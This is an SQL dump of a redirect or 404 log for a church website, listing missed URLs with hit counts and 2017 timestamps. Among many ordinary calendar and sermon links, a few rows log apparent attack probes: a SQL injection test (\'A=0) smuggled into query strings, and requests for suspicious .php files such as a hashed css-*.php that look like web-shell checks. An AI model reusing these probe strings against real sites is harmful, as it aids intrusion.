(910, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/23/-', NULL, '', '', 1, 0, '2017-01-07 18:50:37', '0000-00-00 00:00:00', 301),
(911, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/6/-', NULL, '', '', 1, 0, '2017-01-07 18:54:23', '0000-00-00 00:00:00', 301),
(912, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/16/-', NULL, '', '', 1, 0, '2017-01-07 19:01:57', '0000-00-00 00:00:00', 301),
(913, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/10/-', NULL, '', '', 1, 0, '2017-01-07 19:09:31', '0000-00-00 00:00:00', 301),
(914, 'http://www.lifeoasisinternationalchurch.org/resources/kindom-builder', NULL, '', '', 40, 0, '2017-01-07 19:10:11', '0000-00-00 00:00:00', 301),
(915, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/16-prayer-a-fasting-day-7', NULL, '', '', 6, 0, '2017-01-07 19:16:52', '0000-00-00 00:00:00', 301),
(916, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1945/4/-', NULL, '', '', 1, 0, '2017-01-07 19:17:05', '0000-00-00 00:00:00', 301),
(917, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1944/3/-', NULL, '', '', 1, 0, '2017-01-07 19:20:52', '0000-00-00 00:00:00', 301),
(918, 'http://www.lifeoasisinternationalchurch.org/featured-messages/2-uncategorised/47-videos', NULL, '', '', 23, 0, '2017-01-07 19:24:32', '0000-00-00 00:00:00', 301),
(919, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1939/9/-', NULL, '', '', 1, 0, '2017-01-07 19:24:39', '0000-00-00 00:00:00', 301),
(920, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1939/8/-', NULL, '', '', 1, 0, '2017-01-07 19:28:26', '0000-00-00 00:00:00', 301),
(921, 'http://www.lifeoasisinternationalchurch.org/template-info/music/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-07 19:32:04', '0000-00-00 00:00:00', 301),
(922, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1946/4/-', NULL, '', '', 1, 0, '2017-01-07 19:36:00', '0000-00-00 00:00:00', 301),
(923, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1947/4/-', NULL, '', '', 1, 0, '2017-01-07 19:39:54', '0000-00-00 00:00:00', 301),
(924, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1947/5/-', NULL, '', '', 1, 0, '2017-01-07 19:43:42', '0000-00-00 00:00:00', 301),
(925, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/21-dealing-with-buts-in-your-life', NULL, '', '', 22, 0, '2017-01-07 20:29:24', '0000-00-00 00:00:00', 301),
(926, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/10-grace-2', NULL, '', '', 42, 0, '2017-01-07 20:55:18', '0000-00-00 00:00:00', 301),
(927, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-wordpress/itemlist/tag/music', NULL, '', '', 1, 0, '2017-01-07 21:11:16', '0000-00-00 00:00:00', 301),
(928, 'http://lifeoasisinternationalchurch.org//popup-pomo.php', NULL, '', '', 2, 0, '2017-01-07 22:46:39', '0000-00-00 00:00:00', 301),
(929, 'http://lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-92626d51891363d8686ea2fe6be8b730.php', NULL, '', '', 1, 0, '2017-01-07 23:43:59', '0000-00-00 00:00:00', 301),
(930, 'http://www.lifeoasisinternationalchurch.org/index.php/212-2015-day-38', NULL, '', '', 8, 0, '2017-01-08 00:03:58', '0000-00-00 00:00:00', 301),
(931, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1947/6/-', NULL, '', '', 1, 0, '2017-01-08 00:18:15', '0000-00-00 00:00:00', 301),
(932, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/14/-', NULL, '', '', 1, 0, '2017-01-08 00:18:24', '0000-00-00 00:00:00', 301),
(933, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1947/7/-', NULL, '', '', 1, 0, '2017-01-08 00:18:33', '0000-00-00 00:00:00', 301),
(934, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/27/-', NULL, '', '', 1, 0, '2017-01-08 00:18:42', '0000-00-00 00:00:00', 301),
(935, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/13/-', NULL, '', '', 1, 0, '2017-01-08 00:18:51', '0000-00-00 00:00:00', 301),
(936, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1934/11/-', NULL, '', '', 1, 0, '2017-01-08 00:19:00', '0000-00-00 00:00:00', 301),
(937, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1948/7/-', NULL, '', '', 1, 0, '2017-01-08 00:19:08', '0000-00-00 00:00:00', 301),
(938, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/10/-', NULL, '', '', 1, 0, '2017-01-08 00:19:17', '0000-00-00 00:00:00', 301),
(939, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1945/7/-', NULL, '', '', 1, 0, '2017-01-08 00:19:35', '0000-00-00 00:00:00', 301),
(940, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1932/9/-', NULL, '', '', 1, 0, '2017-01-08 00:19:44', '0000-00-00 00:00:00', 301),
(941, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1931/9/-', NULL, '', '', 1, 0, '2017-01-08 00:19:53', '0000-00-00 00:00:00', 301),
(942, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/5/-', NULL, '', '', 1, 0, '2017-01-08 00:20:02', '0000-00-00 00:00:00', 301),
(943, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/16/-', NULL, '', '', 1, 0, '2017-01-08 00:20:11', '0000-00-00 00:00:00', 301),
(944, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1931/8/-', NULL, '', '', 1, 0, '2017-01-08 00:20:20', '0000-00-00 00:00:00', 301),
(945, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/23/-', NULL, '', '', 1, 0, '2017-01-08 00:20:38', '0000-00-00 00:00:00', 301),
(946, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/6/-', NULL, '', '', 1, 0, '2017-01-08 00:20:47', '0000-00-00 00:00:00', 301),
(947, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1945/5/-', NULL, '', '', 1, 0, '2017-01-08 00:20:56', '0000-00-00 00:00:00', 301),
(948, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/17/-', NULL, '', '', 1, 0, '2017-01-08 00:21:05', '0000-00-00 00:00:00', 301),
(949, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/9/-', NULL, '', '', 1, 0, '2017-01-08 00:21:14', '0000-00-00 00:00:00', 301),
(950, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1931/10/-', NULL, '', '', 1, 0, '2017-01-08 00:21:23', '0000-00-00 00:00:00', 301),
(951, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/3/-', NULL, '', '', 1, 0, '2017-01-08 00:21:41', '0000-00-00 00:00:00', 301),
(952, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1933/12/-', NULL, '', '', 1, 0, '2017-01-08 00:21:59', '0000-00-00 00:00:00', 301),
(953, 'http://www.lifeoasisinternationalchurch.org/index.php/182-2015-day-6', NULL, '', '', 6, 0, '2017-01-08 00:29:52', '0000-00-00 00:00:00', 301),
(954, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=41&Itemid=215', NULL, '', '', 5, 0, '2017-01-08 01:53:47', '0000-00-00 00:00:00', 301),
(955, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/15-entering-into-winning-position-3', NULL, '', '', 22, 0, '2017-01-08 06:58:37', '0000-00-00 00:00:00', 301),
(956, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=45&Itemid=190', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=45&Itemid=190', '', 1, 0, '2017-01-08 07:04:30', '0000-00-00 00:00:00', 301),
(957, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=45&Itemid=190', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=45&Itemid=190', '', 1, 0, '2017-01-08 07:04:32', '0000-00-00 00:00:00', 301),
(958, 'http://lifeoasisinternationalchurch.org/prayer/163-focus21', NULL, '', '', 1, 0, '2017-01-08 08:34:10', '0000-00-00 00:00:00', 301),
(959, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1932/1/-', NULL, '', '', 1, 0, '2017-01-08 08:43:03', '0000-00-00 00:00:00', 301),
(960, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1944/5/-', NULL, '', '', 1, 0, '2017-01-08 08:43:09', '0000-00-00 00:00:00', 301),
(961, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1932/12/-', NULL, '', '', 1, 0, '2017-01-08 08:43:15', '0000-00-00 00:00:00', 301),
(962, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/30/-', NULL, '', '', 1, 0, '2017-01-08 08:43:32', '0000-00-00 00:00:00', 301),
(963, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1933/11/-', NULL, '', '', 1, 0, '2017-01-08 08:43:39', '0000-00-00 00:00:00', 301),
(964, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1930/7/-', NULL, '', '', 1, 0, '2017-01-08 08:43:50', '0000-00-00 00:00:00', 301),
(965, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/26/-', NULL, '', '', 1, 0, '2017-01-08 08:43:56', '0000-00-00 00:00:00', 301),
(966, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1931/1/-', NULL, '', '', 1, 0, '2017-01-08 08:44:09', '0000-00-00 00:00:00', 301),
(967, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/28/-', NULL, '', '', 1, 0, '2017-01-08 08:44:14', '0000-00-00 00:00:00', 301),
(968, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1933/3/-', NULL, '', '', 1, 0, '2017-01-08 08:44:20', '0000-00-00 00:00:00', 301),
(969, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/11/-', NULL, '', '', 1, 0, '2017-01-08 08:44:31', '0000-00-00 00:00:00', 301),
(970, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/15/-', NULL, '', '', 1, 0, '2017-01-08 08:44:37', '0000-00-00 00:00:00', 301),
(971, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1929/8/-', NULL, '', '', 1, 0, '2017-01-08 08:44:43', '0000-00-00 00:00:00', 301),
(972, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/7/-', NULL, '', '', 1, 0, '2017-01-08 08:44:55', '0000-00-00 00:00:00', 301),
(973, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/28/-', NULL, '', '', 1, 0, '2017-01-08 08:45:50', '0000-00-00 00:00:00', 301),
(974, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/13/-', NULL, '', '', 1, 0, '2017-01-08 08:45:54', '0000-00-00 00:00:00', 301),
(975, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/22/-', NULL, '', '', 1, 0, '2017-01-08 08:45:58', '0000-00-00 00:00:00', 301),
(976, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1932/2/-', NULL, '', '', 1, 0, '2017-01-08 08:46:09', '0000-00-00 00:00:00', 301),
(977, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1933/10/-', NULL, '', '', 1, 0, '2017-01-08 08:46:15', '0000-00-00 00:00:00', 301),
(978, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/19/-', NULL, '', '', 1, 0, '2017-01-08 08:46:27', '0000-00-00 00:00:00', 301),
(979, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1929/10/-', NULL, '', '', 1, 0, '2017-01-08 08:46:33', '0000-00-00 00:00:00', 301),
(980, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/24/-', NULL, '', '', 1, 0, '2017-01-08 08:46:39', '0000-00-00 00:00:00', 301),
(981, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/2/-', NULL, '', '', 1, 0, '2017-01-08 08:46:45', '0000-00-00 00:00:00', 301),
(982, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1931/12/-', NULL, '', '', 1, 0, '2017-01-08 08:46:51', '0000-00-00 00:00:00', 301),
(983, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/6/-', NULL, '', '', 1, 0, '2017-01-08 08:46:57', '0000-00-00 00:00:00', 301),
(984, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/7/-', NULL, '', '', 1, 0, '2017-01-08 08:47:02', '0000-00-00 00:00:00', 301),
(985, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1931/2/-', NULL, '', '', 1, 0, '2017-01-08 08:47:08', '0000-00-00 00:00:00', 301),
(986, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/13/-', NULL, '', '', 1, 0, '2017-01-08 08:47:15', '0000-00-00 00:00:00', 301),
(987, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/25/-', NULL, '', '', 1, 0, '2017-01-08 08:47:20', '0000-00-00 00:00:00', 301),
(988, 'http://lifeoasisinternationalchurch.org/resources/kindom-builder/12-resources', NULL, '', '', 1, 0, '2017-01-08 08:47:23', '0000-00-00 00:00:00', 301),
(989, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/16/-', NULL, '', '', 1, 0, '2017-01-08 08:47:26', '0000-00-00 00:00:00', 301),
(990, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/8/-', NULL, '', '', 1, 0, '2017-01-08 08:47:32', '0000-00-00 00:00:00', 301),
(991, 'http://www.lifeoasisinternationalchurch.org/18-loic/50-young-achievers', NULL, '', '', 12, 0, '2017-01-08 09:02:22', '0000-00-00 00:00:00', 301),
(992, 'http://lifeoasisinternationalchurch.org/18-loic/50-young-achievers', NULL, '', '', 20, 0, '2017-01-08 09:02:59', '0000-00-00 00:00:00', 301),
(993, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/10/-', NULL, '', '', 1, 0, '2017-01-08 09:03:10', '0000-00-00 00:00:00', 301),
(994, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1929/2/-', NULL, '', '', 1, 0, '2017-01-08 09:18:17', '0000-00-00 00:00:00', 301),
(995, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/2/-', NULL, '', '', 1, 0, '2017-01-08 09:33:27', '0000-00-00 00:00:00', 301),
(996, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/30/-', NULL, '', '', 1, 0, '2017-01-08 09:59:54', '0000-00-00 00:00:00', 301),
(997, 'http://www.lifeoasisinternationalchurch.org/bin/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/bin/logo_img.php', '', 3, 0, '2017-01-08 10:03:14', '0000-00-00 00:00:00', 301),
(998, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/8/-', NULL, '', '', 1, 0, '2017-01-08 10:03:42', '0000-00-00 00:00:00', 301),
(999, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/50-prayer-a-fasting-day-40', NULL, '', '', 2, 0, '2017-01-08 10:10:04', '0000-00-00 00:00:00', 301),
(1000, 'http://www.lifeoasisinternationalchurch.org/index.php/259-day-13-of-21-days-fasting-and-prayer-october', NULL, '', '', 8, 0, '2017-01-08 10:10:15', '0000-00-00 00:00:00', 301),
(1001, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1925/9/-', NULL, '', '', 1, 0, '2017-01-08 10:11:16', '0000-00-00 00:00:00', 301),
(1002, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/7/-', NULL, '', '', 1, 0, '2017-01-08 10:15:03', '0000-00-00 00:00:00', 301),
(1003, 'http://www.lifeoasisinternationalchurch.org/template-info/ljmti/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-08 10:19:09', '0000-00-00 00:00:00', 301),
(1004, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 7, 0, '2017-01-08 10:22:34', '0000-00-00 00:00:00', 301),
(1005, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/19-prayer-a-fasting-day-10', NULL, '', '', 5, 0, '2017-01-08 10:22:41', '0000-00-00 00:00:00', 301),
(1006, 'http://www.lifeoasisinternationalchurch.org/template-info/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-08 10:22:42', '0000-00-00 00:00:00', 301),
(1007, 'http://lifeoasisinternationalchurch.org/index.php/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-08 10:32:39', '0000-00-00 00:00:00', 301),
(1008, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 9, 0, '2017-01-08 10:42:49', '0000-00-00 00:00:00', 301),
(1009, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/41-prayer-a-fasting-day-30', NULL, '', '', 8, 0, '2017-01-08 11:02:32', '0000-00-00 00:00:00', 301),
(1010, 'http://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-92626d51891363d8686ea2fe6be8b730.php', NULL, '', '', 3, 0, '2017-01-08 13:08:11', '0000-00-00 00:00:00', 301),
(1011, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/23/-', NULL, '', '', 1, 0, '2017-01-08 14:52:58', '0000-00-00 00:00:00', 301),
(1012, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/17/-', NULL, '', '', 1, 0, '2017-01-08 14:53:07', '0000-00-00 00:00:00', 301),
(1013, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/30/-', NULL, '', '', 1, 0, '2017-01-08 14:53:11', '0000-00-00 00:00:00', 301),
(1014, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/10/-', NULL, '', '', 1, 0, '2017-01-08 14:53:15', '0000-00-00 00:00:00', 301),
(1015, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/16/-', NULL, '', '', 1, 0, '2017-01-08 14:53:19', '0000-00-00 00:00:00', 301),
(1016, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/31/-', NULL, '', '', 1, 0, '2017-01-08 14:53:23', '0000-00-00 00:00:00', 301),
(1017, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/11/-', NULL, '', '', 1, 0, '2017-01-08 14:53:36', '0000-00-00 00:00:00', 301),
(1018, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1924/9/-', NULL, '', '', 1, 0, '2017-01-08 14:53:40', '0000-00-00 00:00:00', 301),
(1019, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/1/-', NULL, '', '', 1, 0, '2017-01-08 14:53:44', '0000-00-00 00:00:00', 301),
(1020, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1929/3/-', NULL, '', '', 1, 0, '2017-01-08 14:53:48', '0000-00-00 00:00:00', 301),
(1021, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/7/-', NULL, '', '', 1, 0, '2017-01-08 14:53:56', '0000-00-00 00:00:00', 301),
(1022, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1925/8/-', NULL, '', '', 1, 0, '2017-01-08 14:54:00', '0000-00-00 00:00:00', 301),
(1023, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/5/-', NULL, '', '', 1, 0, '2017-01-08 14:54:05', '0000-00-00 00:00:00', 301),
(1024, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/12/-', NULL, '', '', 1, 0, '2017-01-08 14:54:09', '0000-00-00 00:00:00', 301),
(1025, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/21/-', NULL, '', '', 1, 0, '2017-01-08 14:54:25', '0000-00-00 00:00:00', 301),
(1026, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/4/-', NULL, '', '', 1, 0, '2017-01-08 14:54:29', '0000-00-00 00:00:00', 301),
(1027, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/16/-', NULL, '', '', 1, 0, '2017-01-08 14:54:42', '0000-00-00 00:00:00', 301),
(1028, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/6/-', NULL, '', '', 1, 0, '2017-01-08 14:54:46', '0000-00-00 00:00:00', 301),
(1029, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/23/-', NULL, '', '', 1, 0, '2017-01-08 14:54:54', '0000-00-00 00:00:00', 301),
(1030, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/9/-', NULL, '', '', 1, 0, '2017-01-08 14:54:58', '0000-00-00 00:00:00', 301),
(1031, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/1/-', NULL, '', '', 1, 0, '2017-01-08 14:55:02', '0000-00-00 00:00:00', 301),
(1032, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/1/-', NULL, '', '', 1, 0, '2017-01-08 14:55:07', '0000-00-00 00:00:00', 301),
(1033, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/3/-', NULL, '', '', 1, 0, '2017-01-08 14:55:15', '0000-00-00 00:00:00', 301),
(1034, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/2/-', NULL, '', '', 1, 0, '2017-01-08 14:55:19', '0000-00-00 00:00:00', 301),
(1035, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1929/4/-', NULL, '', '', 1, 0, '2017-01-08 14:55:27', '0000-00-00 00:00:00', 301),
(1036, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1924/8/-', NULL, '', '', 1, 0, '2017-01-08 14:55:31', '0000-00-00 00:00:00', 301),
(1037, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/12/-', NULL, '', '', 1, 0, '2017-01-08 14:55:35', '0000-00-00 00:00:00', 301),
(1038, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1924/10/-', NULL, '', '', 1, 0, '2017-01-08 14:55:40', '0000-00-00 00:00:00', 301),
(1039, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1925/11/-', NULL, '', '', 1, 0, '2017-01-08 14:55:52', '0000-00-00 00:00:00', 301),
(1040, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1925/6/-', NULL, '', '', 1, 0, '2017-01-08 14:55:56', '0000-00-00 00:00:00', 301),
(1041, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/3/-', NULL, '', '', 1, 0, '2017-01-08 14:56:09', '0000-00-00 00:00:00', 301),
(1042, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/2/-', NULL, '', '', 1, 0, '2017-01-08 14:56:13', '0000-00-00 00:00:00', 301),
(1043, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/5/-', NULL, '', '', 1, 0, '2017-01-08 14:56:17', '0000-00-00 00:00:00', 301),
(1044, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/8/-', NULL, '', '', 1, 0, '2017-01-08 14:56:21', '0000-00-00 00:00:00', 301),
(1045, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1925/1/-', NULL, '', '', 1, 0, '2017-01-08 14:56:25', '0000-00-00 00:00:00', 301),
(1046, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1929/5/-', NULL, '', '', 1, 0, '2017-01-08 14:56:29', '0000-00-00 00:00:00', 301),
(1047, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/25/-', NULL, '', '', 1, 0, '2017-01-08 14:56:37', '0000-00-00 00:00:00', 301),
(1048, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/18/-', NULL, '', '', 1, 0, '2017-01-08 14:56:50', '0000-00-00 00:00:00', 301),
(1049, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1925/12/-', NULL, '', '', 1, 0, '2017-01-08 14:56:54', '0000-00-00 00:00:00', 301),
(1050, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/17/-', NULL, '', '', 1, 0, '2017-01-08 14:56:58', '0000-00-00 00:00:00', 301),
(1051, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1923/10/-', NULL, '', '', 1, 0, '2017-01-08 14:57:07', '0000-00-00 00:00:00', 301),
(1052, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/3/-', NULL, '', '', 1, 0, '2017-01-08 14:57:11', '0000-00-00 00:00:00', 301),
(1053, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/15/-', NULL, '', '', 1, 0, '2017-01-08 14:57:15', '0000-00-00 00:00:00', 301),
(1054, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/3/-', NULL, '', '', 1, 0, '2017-01-08 14:57:27', '0000-00-00 00:00:00', 301),
(1055, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/21/-', NULL, '', '', 1, 0, '2017-01-08 14:57:31', '0000-00-00 00:00:00', 301),
(1056, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/14/-', NULL, '', '', 1, 0, '2017-01-08 14:57:44', '0000-00-00 00:00:00', 301),
(1057, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/22/-', NULL, '', '', 1, 0, '2017-01-08 14:57:49', '0000-00-00 00:00:00', 301),
(1058, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/9/-', NULL, '', '', 1, 0, '2017-01-08 14:57:53', '0000-00-00 00:00:00', 301),
(1059, 'http://www.lifeoasisinternationalchurch.org/media/css.php', NULL, '', '', 3, 0, '2017-01-08 15:20:48', '0000-00-00 00:00:00', 301),
(1060, 'http://lifeoasisinternationalchurch.org/index.php/template-info/media-outreach', NULL, '', '', 38, 0, '2017-01-08 15:26:15', '0000-00-00 00:00:00', 301),
(1061, 'https://www.spiritmeat.net/mp3-messages/sermon/12-manifesting-spiritual-gifts', NULL, 'https://www.spiritmeat.net/', '', 2, 0, '2017-01-08 15:34:24', '0000-00-00 00:00:00', 301),
(1062, 'https://www.spiritmeat.net/index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'https://www.spiritmeat.net', '', 4, 0, '2017-01-08 15:34:27', '0000-00-00 00:00:00', 301),
(1063, 'https://www.spiritmeat.net/index.php?option=com_user&view=register', NULL, 'https://www.spiritmeat.net/index.php/component/users/?view=registration', '', 2, 0, '2017-01-08 15:34:30', '0000-00-00 00:00:00', 301),
(1064, 'https://www.spiritmeat.net/index.php/component/user/?task=register', NULL, 'https://www.spiritmeat.net/index.php?option=com_user&view=register', '', 2, 0, '2017-01-08 15:34:31', '0000-00-00 00:00:00', 301),
(1065, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/19-army-of-the-lord-2', NULL, '', '', 3, 0, '2017-01-08 16:34:36', '0000-00-00 00:00:00', 301),
(1066, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/15-entering-into-winning-position-3', NULL, '', '', 8, 0, '2017-01-08 16:38:52', '0000-00-00 00:00:00', 301),
(1067, 'http://lifeoasisinternationalchurch.org/resources/father-s-heart', NULL, '', '', 51, 0, '2017-01-08 16:49:20', '0000-00-00 00:00:00', 301),
(1068, 'http://www.lifeoasisinternationalchurch.org/template-info/gin', NULL, '', '', 10, 0, '2017-01-08 16:51:19', '0000-00-00 00:00:00', 301),
